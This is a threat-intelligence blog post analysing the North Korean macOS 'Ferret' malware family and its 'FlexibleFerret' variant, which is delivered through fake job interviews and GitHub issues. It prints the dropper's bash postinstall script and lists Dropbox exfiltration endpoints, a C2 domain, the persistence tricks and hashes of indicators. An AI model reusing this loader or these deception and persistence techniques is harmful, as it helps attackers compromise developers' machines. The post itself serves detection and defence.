X-Industry

Frosty Ferret

Posted by CyberDog on February 13, 2025 at 8:00am

13453772276?profile=RESIZE_400xTwo weeks ago, Apple pushed a signature update to its on-device malware tool XProtect to block several variants of what it called the macOS Ferret family: FROSTYFERRET_UI, FRIENDLYFERRET_SECD, and MULTI_FROSTYFERRET_CMDCODES. This DPRK-attributed malware family was first described by researchers in December and further in early January and identified as part of the North Korean Contagious Interview campaign, in which threat actors lure targets to install malware through the job interview process.

Below, Sentinel Labs briefly recaps previous research for context, including Apple’s contribution through its malware signatures, before describing newly discovered samples that we have labeled ‘FlexibleFerret’ and which remain undetected by XProtect at the time of writing. Researchers provide a high-level overview of the malware along with a list of indicators for threat hunters and defenders. SentinelOne customers are protected from all known variants of the Ferret family.

A Ferret Family Background - As noted above, previous researchers have described several malware components associated with the Contagious Interview campaign. Targets are typically asked to communicate with an interviewer through a link that throws an error message and a request to install or update some required piece of software, such as VCam or CameraAccess, for virtual meetings. In previous reports, the observed malware ran a malicious shell script and installed a persistence agent and executable masquerading as a Google Chrome update. An excellent post published on January 5th digs into the details and source code of the shell loader, ffmpeg.sh, and the Go backdoor and stealer called, appropriately enough, ChromeUpdate.

Apple’s signature update last week targeted some of the components of this malware campaign, including a backdoor that masquerades as an operating system file named com.apple.secd (aka FRIENDLYFERRET) and the ChromeUpdate and CameraAccess persistence modules (aka FROSTYFERRET_UI).

Perhaps unsurprisingly, indicators present in the FERRET family of malware overlap with indicators seen in other DPRK campaigns, including the Hidden Risk campaign described recently by SentinelLABS.

13453772086?profile=RESIZE_710xSome common DPRK malware artifacts are also seen in the Stage 2 ‘growth’ malware from Hidden Risk.

Another commonality between FERRET and other recent DPRK campaigns is the use of Dropbox for exfiltration and the use of api.ipify.org to resolve the host’s public IP.
21 22 3.__TEXT.__cstring ascii https://api.ipify.org
39 40 3.__TEXT.__cstring ascii https://api.dropboxapi.com/oauth2/token
45 46 3.__TEXT.__cstring ascii https://content.dropboxapi.com/2/files/upload
FlexibleFerret | An Expanded Malware Family Set—Prior to Apple pushing XProtect version 5286, SentinelLABS had been tracking the malware identified by previous researchers and analyzing a variant of the ChromeUpdate samples with the identifier Mac-Installer.InstallerAlert. Unlike the previous samples, this malware was signed with a valid Apple Developer signature (VFYPGAKSLY) and Team ID (58CD8AD5Z4). Pivoting off this led us to another previously unseen infection vector and a set of related samples.
The dropper is an Apple Installer package called versus.pkg (388ac48764927fa353328104d5a32ad825af51ce). It contains two applications, InstallerAlert.app and versus.app, a standalone binary called Zoom, and a post-install.sh script in the parent folder.
13453772674?profile=RESIZE_710xFile contents of the FlexibleFerret dropper, versus.pkg

After grabbing elevated privileges, the installer package uses the postinstall script to drop and execute several components in /var/tmp/. The postinstall script is a bash script that also logs its progress to a file in the separate /private/tmp/ folder called postinstall.log.
#!/bin/bash
# Log the start of the script
echo "$(date): Running post-installation script..." >> /tmp/postinstall.log

# Check if the zoom file exists and execute it
if [ -f /var/tmp/zoom ]; then
echo "$(date): Zoom file exists, executing..." >> /tmp/postinstall.log
/var/tmp/zoom >> /tmp/postinstall.log 2>&1 &
else
echo "$(date): Zoom file not found" >> /tmp/postinstall.log
fi

# Wait for 2 seconds
sleep 2

# Open the InstallerAlert.app if it exists
if [ -d "/var/tmp/InstallerAlert.app" ]; then
echo "$(date): Opening InstallerAlert.app..." >> /tmp/postinstall.log
open "/var/tmp/InstallerAlert.app" >> /tmp/postinstall.log 2>&1
else
echo "$(date): InstallerAlert.app not found" >> /tmp/postinstall.log
fi

# Wait for 2 seconds
sleep 2

# Log the end of the script
echo "$(date): Post-installation script completed." >> /tmp/postinstall.log

exit 0
13453773075?profile=RESIZE_710xFlexibleFerret components dropped in the hosts /var/tmp folder/

The fake zoom binary (ee7a557347a10f74696dc19512ccc5fcfca77bc5) reaches out to the domain zoom.callservice[.]us. (*Note: this is not a legitimate Zoom domain). Meanwhile, the same script executes the InstallerAlert.app, whose primary function is to trick the user into thinking the malware is a legitimate application that failed to run by throwing an alert dialog with the error message “This file is damaged and cannot be opened”, a message that mimics the genuine warning message typically thrown by Gatekeeper.

13453772882?profile=RESIZE_710xEmbedded strings in InstallerAlert to deceive victims that the malware did not execute

In the background, however, the malware installs a persistence item in the User’s Library LaunchAgents folder with the label com.zoom.plist (*Note: the genuine Zoom Launch services file is in fact [~]/Library/LaunchAgents/us.zoom.ZoomDaemon.plist).

13453773275?profile=RESIZE_710xStrings in the zoom binary for setting up persistence

The LaunchAgent targets a further executable at the path /private/var/tmp/logd, again masquerading as a legitimate part of the OS (logd is part of the unified logging system but does not have a component at that path). At the time of writing, we were not able to obtain a copy of this file, which appears to be received from the currently non-responding C2.
Execution of FlexibleFerret noisily leaves a log in /private/tmp/

13453771494?profile=RESIZE_710xFlexibleFerret | InstallerAlert and Ties to ChromeUpdate

What ties these components to Apple’s recent FERRET rules and the samples previously reported is the Mac-Installer.InstallerAlert binary inside the InstallerAlert.app. This binary is a functional match for the ChromeUpdate binary and bears an 86% similarity to it. It contains both strings and functions that are identical only to ChromeUpdate and other files identified by Apple’s signature as malware. Importantly, however, neither InstallerAlert nor any of the other binaries found in the malicious versus.pkg are recognized as malware by XProtect. Further, unlike ChromeUpdate, InstallerAlert is signed with a now-revoked Developer signature and Team ID. Pivoting off this signature allowed us to find several other samples of FlexibleFerret that are recognized as malware by a number of security vendors including SentinelOne.

‘Contagious Interview’ Campaign Actively Targeting GitHub Developers—As noted earlier, the FlexibleFerret malware is a component of the ‘Contagious Interview’ campaign, which began at least as far back as November 2023. Sentinel Labs has further observed threat actors continuing to attempt to compromise developers with the FFmpeg.sh installer script by opening fake issues on legitimate developers’ repositories. In late December, for example, one ‘commenter’ left instructions leading to the download of FERRET family droppers.

13453771856?profile=RESIZE_584xA threat actor tries to trick GitHub users into downloading FERRET malware

This suggests that the threat actors are happy to expand the vectors by which they deliver the malware beyond the specific targeting of job seekers to developers more generally.

Conclusion—The ‘Contagious Interview’ campaign and the FERRET family of malware represent an ongoing and active campaign. As required, threat actors pivot from signed applications to functionally similar unsigned versions. Diverse tactics help the threat actors deliver malware to a variety of targets in the developer community, both in targeted efforts and what appear to be more ‘scatter gun’ approaches via social media and code-sharing sites like GitHub.

Indicators of Compromise
FrostyFerret ZIPS
203f7cfbf22b30408591e6148f5978350676268b VCam_ARM64.zip
a25dff88aeeaaf9f956446151a9d786495e2c546 CameraAccess.zip
aa172bdccb8c14f53c059c8433c539049b6c2cdd VCam_x86_64.zip
XProtect_FrostyFerret_UI
7da429f6d2cdd8a63b3930074797b990c02dc108
7e07765bf8ee2d0b2233039623016d6dfb610a6d
828a323b92b24caa5f5e3eff438db4556d15f215
831cdcde47b4edbe27524085a6706fbfb9526cef
8667078a88dae5471f50473a332f6c80b583d3de
dba1454fbea1dd917712fbece9d6725244119f83
e876ba6e23e09206f358dbd3a3642a7fd311bb22
XProtect_FriendlyFerret_SECD
17e3906f6c4c97b6f5d10e0e0e7f2a2e2c97ca54
2e51218985afcaa18eadc5775e6b374c78e2d85f
7e07765bf8ee2d0b2233039623016d6dfb610a6d
de3f83af6897a124d1e85a65818a80570b33c47c
FlexibleFerret Installer
388ac48764927fa353328104d5a32ad825af51ce versus.pkg
FlexibleFerret Mach-Os
1a28013e4343fddf13e5c721f91970e942073b88 InstallerAlert
3e16c6489bac4ac2d76c555eb1c263cd7e92c9a5 InstallerAlert
76e3cb7be778f22d207623ce1907c1659f2c8215 InstallerAlert
b0caf49884d68f72d2a62aa32d5edf0e79fd9de1 InstallerAlert
bd73a1c03c24a8cdd744d8a513ae8d2ddfa2de5f InstallerAlert
ccac0f0ba463c414b26ba67b5a3ddaabdef6d371 InstallerAlert
d8245cdf6f51216f29a71f25e70de827186bdf71 InstallerAlert
b071fbd9c42ff660e3f240e1921533e40f0067eb Mac-Installer.AlertMsg
ee7a557347a10f74696dc19512ccc5fcfca77bc5 zoom
FlexibleFerret Signer
Name: Liseth Alejandra Trujillo Garcia
Team Identifier: 58CD8AD5Z4
Dev Identifier: VFYPGAKSLY
FlexibleFerret Bundle Ids
Mac-Installer.AlertMsg
Mac-Installer.InstallerAlert
FlexibleFerret DNS Domain
zoom.callservice[.]us

 

This article is shared at no charge for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments, or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com

• Reporting: https://www.redskyalliance.org/
• Website: https://www.redskyalliance.com/
• LinkedIn: https://www.linkedin.com/company/64265941

Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122

Views: 418
Tags: ir-25-042-001, apple, frosty ferret, install malware via job interview, zoomcallservice, chromeupdate
E-mail me when people leave their comments –
Follow

You need to be a member of Red Sky Alliance to add comments!